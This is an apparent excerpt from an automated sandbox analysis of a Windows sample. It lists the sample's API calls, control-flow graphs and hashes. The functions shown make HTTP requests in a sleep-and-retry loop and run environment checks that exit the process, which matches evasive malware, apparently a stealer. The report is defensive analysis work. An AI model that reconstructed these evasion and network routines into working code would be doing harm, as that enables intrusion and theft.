                              • GetProcAddress.KERNEL32(74390000,009BD038), ref: 00BFA1A9
                              • GetProcAddress.KERNEL32(74390000,009BD248), ref: 00BFA1C2
                              • GetProcAddress.KERNEL32(74390000,009A5008), ref: 00BFA1DA
                              • GetProcAddress.KERNEL32(74390000,009A5048), ref: 00BFA1F2
                              • GetProcAddress.KERNEL32(74390000,009BD260), ref: 00BFA20B
                              • GetProcAddress.KERNEL32(768D0000,009A50E8), ref: 00BFA22C
                              • GetProcAddress.KERNEL32(768D0000,009A5328), ref: 00BFA244
                              • GetProcAddress.KERNEL32(768D0000,009BD0F8), ref: 00BFA25D
                              • GetProcAddress.KERNEL32(768D0000,009BD080), ref: 00BFA275
                              • GetProcAddress.KERNEL32(768D0000,009A5028), ref: 00BFA28D
                              • GetProcAddress.KERNEL32(75790000,009AA870), ref: 00BFA2B3
                              • GetProcAddress.KERNEL32(75790000,009AA578), ref: 00BFA2CB
                              • GetProcAddress.KERNEL32(75790000,009BD0E0), ref: 00BFA2E3
                              • GetProcAddress.KERNEL32(75790000,009A5068), ref: 00BFA2FC
                              • GetProcAddress.KERNEL32(75790000,009A5168), ref: 00BFA314
                              • GetProcAddress.KERNEL32(75790000,009AA708), ref: 00BFA32C
                              • GetProcAddress.KERNEL32(75A10000,009BD140), ref: 00BFA352
                              • GetProcAddress.KERNEL32(75A10000,009A4FA8), ref: 00BFA36A
                              • GetProcAddress.KERNEL32(75A10000,009B8B68), ref: 00BFA382
                              • GetProcAddress.KERNEL32(75A10000,009BD158), ref: 00BFA39B
                              • GetProcAddress.KERNEL32(75A10000,009BD188), ref: 00BFA3B3
                              • GetProcAddress.KERNEL32(75A10000,009A5108), ref: 00BFA3CB
                              • GetProcAddress.KERNEL32(75A10000,009A5348), ref: 00BFA3E4
                              • GetProcAddress.KERNEL32(75A10000,009BD2D8), ref: 00BFA3FC
                              • GetProcAddress.KERNEL32(75A10000,009BD1A0), ref: 00BFA414
                              • GetProcAddress.KERNEL32(76850000,009A51C8), ref: 00BFA436
                              • GetProcAddress.KERNEL32(76850000,009BD278), ref: 00BFA44E
                              • GetProcAddress.KERNEL32(76850000,009BD2C0), ref: 00BFA466
                              • GetProcAddress.KERNEL32(76850000,009BD2F0), ref: 00BFA47F
                              • GetProcAddress.KERNEL32(76850000,009BD308), ref: 00BFA497
                              • GetProcAddress.KERNEL32(75690000,009A5088), ref: 00BFA4B8
                              • GetProcAddress.KERNEL32(75690000,009A50C8), ref: 00BFA4D1
                              • GetProcAddress.KERNEL32(769C0000,009A5228), ref: 00BFA4F2
                              • GetProcAddress.KERNEL32(769C0000,009BD1B8), ref: 00BFA50A
                              • GetProcAddress.KERNEL32(6F8C0000,009A5288), ref: 00BFA530
                              • GetProcAddress.KERNEL32(6F8C0000,009A5128), ref: 00BFA548
                              • GetProcAddress.KERNEL32(6F8C0000,009A52A8), ref: 00BFA560
                              • GetProcAddress.KERNEL32(6F8C0000,009BD3E0), ref: 00BFA579
                              • GetProcAddress.KERNEL32(6F8C0000,009A4FC8), ref: 00BFA591
                              • GetProcAddress.KERNEL32(6F8C0000,009A52E8), ref: 00BFA5A9
                              • GetProcAddress.KERNEL32(6F8C0000,009A5248), ref: 00BFA5C2
                              • GetProcAddress.KERNEL32(6F8C0000,009A51A8), ref: 00BFA5DA
                              • GetProcAddress.KERNEL32(6F8C0000,InternetSetOptionA), ref: 00BFA5F1
                              • GetProcAddress.KERNEL32(6F8C0000,HttpQueryInfoA), ref: 00BFA607
                              • GetProcAddress.KERNEL32(75D90000,009BD3F8), ref: 00BFA629
                              • GetProcAddress.KERNEL32(75D90000,009B8B08), ref: 00BFA641
                              • GetProcAddress.KERNEL32(75D90000,009BD380), ref: 00BFA659
                              • GetProcAddress.KERNEL32(75D90000,009BD368), ref: 00BFA672
                              • GetProcAddress.KERNEL32(76470000,009A5148), ref: 00BFA693
                              • GetProcAddress.KERNEL32(70220000,009BD398), ref: 00BFA6B4
                              • GetProcAddress.KERNEL32(70220000,009A52C8), ref: 00BFA6CD
                              • GetProcAddress.KERNEL32(70220000,009BD410), ref: 00BFA6E5
                              • GetProcAddress.KERNEL32(70220000,009BD3B0), ref: 00BFA6FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: HttpQueryInfoA$InternetSetOptionA
                              • API String ID: 2238633743-1775429166
                              • Opcode ID: c106ee7e8803ea820bd5af3d21aeee13d17223c410d911eaf43bbe51e3424a19
                              • Instruction ID: b45e5102ab6990b658e48f7ed790638235ff5e16168c70f684936f897e69e365
                              • Opcode Fuzzy Hash: c106ee7e8803ea820bd5af3d21aeee13d17223c410d911eaf43bbe51e3424a19
                              • Instruction Fuzzy Hash: 13620FB5500200AFC368DFAAEE8896637F9F74C70171C853BE60AE3264D739944BDB56
                              Function 00BE6280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1033 be6280-be630b call bfa7a0 call be47b0 call bfa740 InternetOpenA StrCmpCA 1040 be630d 1033->1040 1041 be6314-be6318 1033->1041 1040->1041 1042 be631e-be6342 InternetConnectA 1041->1042 1043 be6509-be6525 call bfa7a0 call bfa800 * 2 1041->1043 1044 be64ff-be6503 InternetCloseHandle 1042->1044 1045 be6348-be634c 1042->1045 1061 be6528-be652d 1043->1061 1044->1043 1047 be634e-be6358 1045->1047 1048 be635a 1045->1048 1050 be6364-be6392 HttpOpenRequestA 1047->1050 1048->1050 1052 be6398-be639c 1050->1052 1053 be64f5-be64f9 InternetCloseHandle 1050->1053 1056 be639e-be63bf InternetSetOptionA 1052->1056 1057 be63c5-be6405 HttpSendRequestA HttpQueryInfoA 1052->1057 1053->1044 1056->1057 1059 be642c-be644b call bf8940 1057->1059 1060 be6407-be6427 call bfa740 call bfa800 * 2 1057->1060 1066 be644d-be6454 1059->1066 1067 be64c9-be64e9 call bfa740 call bfa800 * 2 1059->1067 1060->1061 1070 be6456-be6480 InternetReadFile 1066->1070 1071 be64c7-be64ef InternetCloseHandle 1066->1071 1067->1061 1076 be648b 1070->1076 1077 be6482-be6489 1070->1077 1071->1053 1076->1071 1077->1076 1080 be648d-be64c5 call bfa9b0 call bfa8a0 call bfa800 1077->1080 1080->1070
                              APIs
                                • Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6
                                • Part of subcall function 00BE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BE4839
                                • Part of subcall function 00BE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BE4849
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                              • InternetOpenA.WININET(00C00DFE,00000001,00000000,00000000,00000000), ref: 00BE62E1
                              • StrCmpCA.SHLWAPI(?,009BF440), ref: 00BE6303
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BE6335
                              • HttpOpenRequestA.WININET(00000000,GET,?,009BEC40,00000000,00000000,00400100,00000000), ref: 00BE6385
                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00BE63BF
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BE63D1
                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00BE63FD
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00BE646D
                              • InternetCloseHandle.WININET(00000000), ref: 00BE64EF
                              • InternetCloseHandle.WININET(00000000), ref: 00BE64F9
                              • InternetCloseHandle.WININET(00000000), ref: 00BE6503
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                              • String ID: ERROR$ERROR$GET
                              • API String ID: 3749127164-2509457195
                              • Opcode ID: 25e97103d7bba24f0aec7038cbebe8aa177eff6267a8b68671eeaf53a46b7024
                              • Instruction ID: c359e3c36ebb0ec669479e648d05a661188dcf3554032e932eff5fc67187f769
                              • Opcode Fuzzy Hash: 25e97103d7bba24f0aec7038cbebe8aa177eff6267a8b68671eeaf53a46b7024
                              • Instruction Fuzzy Hash: FB715E71A00258AFDB24DB95CC49FEEB7B8FB54700F1081A9F6096B1D0DBB46A89CF51
                              Function 00BF5510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1090 bf5510-bf5577 call bf5ad0 call bfa820 * 3 call bfa740 * 4 1106 bf557c-bf5583 1090->1106 1107 bf55d7-bf564c call bfa740 * 2 call be1590 call bf52c0 call bfa8a0 call bfa800 call bfaad0 StrCmpCA 1106->1107 1108 bf5585-bf55b6 call bfa820 call bfa7a0 call be1590 call bf51f0 1106->1108 1134 bf5693-bf56a9 call bfaad0 StrCmpCA 1107->1134 1137 bf564e-bf568e call bfa7a0 call be1590 call bf51f0 call bfa8a0 call bfa800 1107->1137 1124 bf55bb-bf55d2 call bfa8a0 call bfa800 1108->1124 1124->1134 1140 bf56af-bf56b6 1134->1140 1141 bf57dc-bf5844 call bfa8a0 call bfa820 * 2 call be1670 call bfa800 * 4 call bf6560 call be1550 1134->1141 1137->1134 1142 bf56bc-bf56c3 1140->1142 1143 bf57da-bf585f call bfaad0 StrCmpCA 1140->1143 1272 bf5ac3-bf5ac6 1141->1272 1146 bf571e-bf5793 call bfa740 * 2 call be1590 call bf52c0 call bfa8a0 call bfa800 call bfaad0 StrCmpCA 1142->1146 1147 bf56c5-bf5719 call bfa820 call bfa7a0 call be1590 call bf51f0 call bfa8a0 call bfa800 1142->1147 1161 bf5865-bf586c 1143->1161 1162 bf5991-bf59f9 call bfa8a0 call bfa820 * 2 call be1670 call bfa800 * 4 call bf6560 call be1550 1143->1162 1146->1143 1250 bf5795-bf57d5 call bfa7a0 call be1590 call bf51f0 call bfa8a0 call bfa800 1146->1250 1147->1143 1167 bf598f-bf5a14 call bfaad0 StrCmpCA 1161->1167 1168 bf5872-bf5879 1161->1168 1162->1272 1197 bf5a28-bf5a91 call bfa8a0 call bfa820 * 2 call be1670 call bfa800 * 4 call bf6560 call be1550 1167->1197 1198 bf5a16-bf5a21 Sleep 1167->1198 1174 bf587b-bf58ce call bfa820 call bfa7a0 call be1590 call bf51f0 call bfa8a0 call bfa800 1168->1174 1175 bf58d3-bf5948 call bfa740 * 2 call be1590 call bf52c0 call bfa8a0 call bfa800 call bfaad0 StrCmpCA 1168->1175 1174->1167 1175->1167 1276 bf594a-bf598a call bfa7a0 call be1590 call bf51f0 call bfa8a0 call bfa800 1175->1276 1197->1272 1198->1106 1250->1143 1276->1167
                              APIs
                                • Part of subcall function 00BFA820: lstrlen.KERNEL32(00BE4F05,?,?,00BE4F05,00C00DDE), ref: 00BFA82B
                                • Part of subcall function 00BFA820: lstrcpy.KERNEL32(00C00DDE,00000000), ref: 00BFA885
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BF5644
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BF56A1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BF5857
                                • Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6
                                • Part of subcall function 00BF51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BF5228
                                • Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905
                                • Part of subcall function 00BF52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BF5318
                                • Part of subcall function 00BF52C0: lstrlen.KERNEL32(00000000), ref: 00BF532F
                                • Part of subcall function 00BF52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00BF5364
                                • Part of subcall function 00BF52C0: lstrlen.KERNEL32(00000000), ref: 00BF5383
                                • Part of subcall function 00BF52C0: lstrlen.KERNEL32(00000000), ref: 00BF53AE
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BF578B
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BF5940
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BF5A0C
                              • Sleep.KERNEL32(0000EA60), ref: 00BF5A1B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen$Sleep
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 507064821-2791005934
                              • Opcode ID: 2057d934e69efbeb110564f36c51ee843d611dae79b843a1c9a4dcaa7e921311
                              • Instruction ID: 3830a8e1482224399f7f252538ea49926ea7e19a147ba09c054ca90ec0da8f5e
                              • Opcode Fuzzy Hash: 2057d934e69efbeb110564f36c51ee843d611dae79b843a1c9a4dcaa7e921311
                              • Instruction Fuzzy Hash: D0E122B191010C9BCB18FBA4DC56EFD73B8AF54340F5485A8B60A67095EF746E0ECB92
                              Function 00BF17A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1301 bf17a0-bf17cd call bfaad0 StrCmpCA 1304 bf17cf-bf17d1 ExitProcess 1301->1304 1305 bf17d7-bf17f1 call bfaad0 1301->1305 1309 bf17f4-bf17f8 1305->1309 1310 bf17fe-bf1811 1309->1310 1311 bf19c2-bf19cd call bfa800 1309->1311 1313 bf199e-bf19bd 1310->1313 1314 bf1817-bf181a 1310->1314 1313->1309 1316 bf187f-bf1890 StrCmpCA 1314->1316 1317 bf185d-bf186e StrCmpCA 1314->1317 1318 bf1835-bf1844 call bfa820 1314->1318 1319 bf1913-bf1924 StrCmpCA 1314->1319 1320 bf1932-bf1943 StrCmpCA 1314->1320 1321 bf18f1-bf1902 StrCmpCA 1314->1321 1322 bf1951-bf1962 StrCmpCA 1314->1322 1323 bf1970-bf1981 StrCmpCA 1314->1323 1324 bf18cf-bf18e0 StrCmpCA 1314->1324 1325 bf198f-bf1999 call bfa820 1314->1325 1326 bf18ad-bf18be StrCmpCA 1314->1326 1327 bf1849-bf1858 call bfa820 1314->1327 1328 bf1821-bf1830 call bfa820 1314->1328 1348 bf189e-bf18a1 1316->1348 1349 bf1892-bf189c 1316->1349 1346 bf187a 1317->1346 1347 bf1870-bf1873 1317->1347 1318->1313 1333 bf1926-bf1929 1319->1333 1334 bf1930 1319->1334 1335 bf194f 1320->1335 1336 bf1945-bf1948 1320->1336 1331 bf190e 1321->1331 1332 bf1904-bf1907 1321->1332 1337 bf196e 1322->1337 1338 bf1964-bf1967 1322->1338 1340 bf198d 1323->1340 1341 bf1983-bf1986 1323->1341 1329 bf18ec 1324->1329 1330 bf18e2-bf18e5 1324->1330 1325->1313 1350 bf18ca 1326->1350 1351 bf18c0-bf18c3 1326->1351 1327->1313 1328->1313 1329->1313 1330->1329 1331->1313 1332->1331 1333->1334 1334->1313 1335->1313 1336->1335 1337->1313 1338->1337 1340->1313 1341->1340 1346->1313 1347->1346 1355 bf18a8 1348->1355 1349->1355 1350->1313 1351->1350 1355->1313
                              APIs
                              • StrCmpCA.SHLWAPI(00000000,block), ref: 00BF17C5
                              • ExitProcess.KERNEL32 ref: 00BF17D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: 24fc569659c759c5d399c9a2bf8b2ccf58a930cbe3812c3009ec5c2103a98a72
                              • Instruction ID: dfa26d01bae16557b9273b1194ee2ce6edf3af3841b7593573f7b6fb69a06e03
                              • Opcode Fuzzy Hash: 24fc569659c759c5d399c9a2bf8b2ccf58a930cbe3812c3009ec5c2103a98a72
                              • Instruction Fuzzy Hash: 18514FB4A0020DEFCB18DFA5D994BBE77F5BF44704F108898E60567240D7B0E95ADB62
                              Function 00BF7500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1356 bf7500-bf754a GetWindowsDirectoryA 1357 bf754c 1356->1357 1358 bf7553-bf75c7 GetVolumeInformationA call bf8d00 * 3 1356->1358 1357->1358 1365 bf75d8-bf75df 1358->1365 1366 bf75fc-bf7617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 bf75e1-bf75fa call bf8d00 1365->1367 1369 bf7619-bf7626 call bfa740 1366->1369 1370 bf7628-bf7658 wsprintfA call bfa740 1366->1370 1367->1365 1377 bf767e-bf768e 1369->1377 1370->1377
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00BF7542
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BF757F
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BF7603
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00BF760A
                              • wsprintfA.USER32 ref: 00BF7640
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                              • String ID: :$C$\
                              • API String ID: 1544550907-3809124531
                              • Opcode ID: b8adab5b68116087eaf6587660988c8c6ed52607fe0f955953c74ffe41b3df93
                              • Instruction ID: e76ca349ad980de244a458d865efbb0dfbd3839e69ad0941f9815c52099c8123
                              • Opcode Fuzzy Hash: b8adab5b68116087eaf6587660988c8c6ed52607fe0f955953c74ffe41b3df93
                              • Instruction Fuzzy Hash: F04182B194424CABDF10DB94DC85BEEB7B8EF18700F1400E9F609A7280DB746A48CBA5
                              Function 00BF69F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 00BF9860: GetProcAddress.KERNEL32(77190000,009B15E8), ref: 00BF98A1
                                • Part of subcall function 00BF9860: GetProcAddress.KERNEL32(77190000,009B16F0), ref: 00BF98BA
                                • Part of subcall function 00BF9860: GetProcAddress.KERNEL32(77190000,009B1738), ref: 00BF98D2
                                • Part of subcall function 00BF9860: GetProcAddress.KERNEL32(77190000,009B1588), ref: 00BF98EA
                                • Part of subcall function 00BF9860: GetProcAddress.KERNEL32(77190000,009B16A8), ref: 00BF9903
                                • Part of subcall function 00BF9860: GetProcAddress.KERNEL32(77190000,009B8B38), ref: 00BF991B
                                • Part of subcall function 00BF9860: GetProcAddress.KERNEL32(77190000,009A55E8), ref: 00BF9933
                                • Part of subcall function 00BF9860: GetProcAddress.KERNEL32(77190000,009A53A8), ref: 00BF994C
                                • Part of subcall function 00BF9860: GetProcAddress.KERNEL32(77190000,009B1510), ref: 00BF9964
                                • Part of subcall function 00BF9860: GetProcAddress.KERNEL32(77190000,009B14F8), ref: 00BF997C
                                • Part of subcall function 00BF9860: GetProcAddress.KERNEL32(77190000,009B1618), ref: 00BF9995
                                • Part of subcall function 00BF9860: GetProcAddress.KERNEL32(77190000,009B16C0), ref: 00BF99AD
                                • Part of subcall function 00BF9860: GetProcAddress.KERNEL32(77190000,009A5408), ref: 00BF99C5
                                • Part of subcall function 00BF9860: GetProcAddress.KERNEL32(77190000,009B1630), ref: 00BF99DE
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                                • Part of subcall function 00BE11D0: ExitProcess.KERNEL32 ref: 00BE1211
                                • Part of subcall function 00BE1160: GetSystemInfo.KERNEL32(?), ref: 00BE116A
                                • Part of subcall function 00BE1160: ExitProcess.KERNEL32 ref: 00BE117E
                                • Part of subcall function 00BE1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00BE112B
                                • Part of subcall function 00BE1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00BE1132
                                • Part of subcall function 00BE1110: ExitProcess.KERNEL32 ref: 00BE1143
                                • Part of subcall function 00BE1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00BE123E
                                • Part of subcall function 00BE1220: ExitProcess.KERNEL32 ref: 00BE1294
                                • Part of subcall function 00BF6770: GetUserDefaultLangID.KERNEL32 ref: 00BF6774
                                • Part of subcall function 00BE1190: ExitProcess.KERNEL32 ref: 00BE11C6
                                • Part of subcall function 00BF7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00BE11B7), ref: 00BF7880
                                • Part of subcall function 00BF7850: RtlAllocateHeap.NTDLL(00000000), ref: 00BF7887
                                • Part of subcall function 00BF7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00BF789F
                                • Part of subcall function 00BF78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BF7910
